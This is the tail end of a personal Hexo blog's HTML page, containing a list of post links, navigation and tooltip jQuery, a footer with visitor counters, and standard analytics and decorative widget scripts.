href="/2020/11/19/leetcode/">准霸霸的Leetcode第一次提交</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/11/18/%E6%88%90%E4%B8%BA%E9%9C%B8%E9%9C%B8/">今天的菜鸟，明天的霸霸</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/11/17/hello-world/">Hello World</a></li></ul>
    
<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>

    <script>
        $(".post-list").addClass("toc-article");
        // $(".post-list-item a").attr("target","_blank");
        $("#post-nav-button > a:nth-child(2)").click(function() {
            $(".fa-bars, .fa-times").toggle();
            $(".post-list").toggle(300);
            if ($(".toc").length > 0) {
                $("#toc, #tocButton").toggle(200, function() {
                    if ($(".switch-area").is(":visible")) {
                        $("#toc, .switch-btn, .switch-area").toggle();
                        $("#tocButton").attr("value", valueHide);
                        }
                    })
            }
            else {
                $(".switch-btn, .switch-area").fadeToggle(300);
            }
        })
    </script>




    <script>
        
    </script>

</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                &copy; 2021 Jialu
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank">Hexo &nbsp;&nbsp;</a><a href="https://github.com/maochunguang" target="_blank">Blog</a> by tommy
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" >极客到访数: 
                            <span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>, </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit">本页阅读量: 
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>

    </div>
    
<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>


<script src="/js/main.js"></script>


    <script>
        $(document).ready(function() {
            var backgroundnum = 1;
            var backgroundimg = "url(/background/bg-" + backgroundnum +".jpg)";
            $("#mobile-nav").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
            $(".left-col").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
        })
    </script>


<!-- Google Analytics -->
<script type="text/javascript">
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');

ga('create', 'xxxxx', 'auto');
ga('send', 'pageview');

</script>
<!-- End Google Analytics -->



	<script>
	var _hmt = _hmt || [];
	(function() {
	  var hm = document.createElement("script");
	  hm.src = "//hm.baidu.com/hm.js?xxxxxx";
	  var s = document.getElementsByTagName("script")[0]; 
	  s.parentNode.insertBefore(hm, s);
	})();
	</script>



<div class="scroll" id="scroll">
    <a href="#"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    $(document).ready(function() {
        if ($("#comments").length < 1) {
            $("#scroll > a:nth-child(2)").hide();
        };
    })
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>

  <script language="javascript">
    $(function() {
        $("a[title]").each(function() {
            var a = $(this);
            var title = a.attr('title');
            if (title == undefined || title == "") return;
            a.data('title', title).removeAttr('title').hover(
            function() {
                var offset = a.offset();
                $("<div id=\"anchortitlecontainer\"></div>").appendTo($("body")).html(title).css({
                    top: offset.top - a.outerHeight() - 15,
                    left: offset.left + a.outerWidth()/2 + 1
                }).fadeIn(function() {
                    var pop = $(this);
                    setTimeout(function() {
                        pop.remove();
                    }, pop.text().length * 800);
                });
            }, function() {
                $("#anchortitlecontainer").remove();
            });
        });
    });
</script>


  </div>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"model":{"jsonPath":"/live2dw/assets/haruto.model.json"},"display":{"position":"right","width":250,"height":500},"mobile":{"show":true},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
<!--动态线条背景-->
<script type="text/javascript"
color="0,0,0" opacity='0.7' zIndex="-2" count="200" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js">
</script>
<!-- 雪花特效 -->
<script type="text/javascript" src="\js\snow.js"></script>
<!--浏览器搞笑标题-->
<script type="text/javascript" src="\js\FunnyTitle.js"></script>
<!--单击显示文字-->
<script type="text/javascript" src="/js/click_show_text.js"></script>
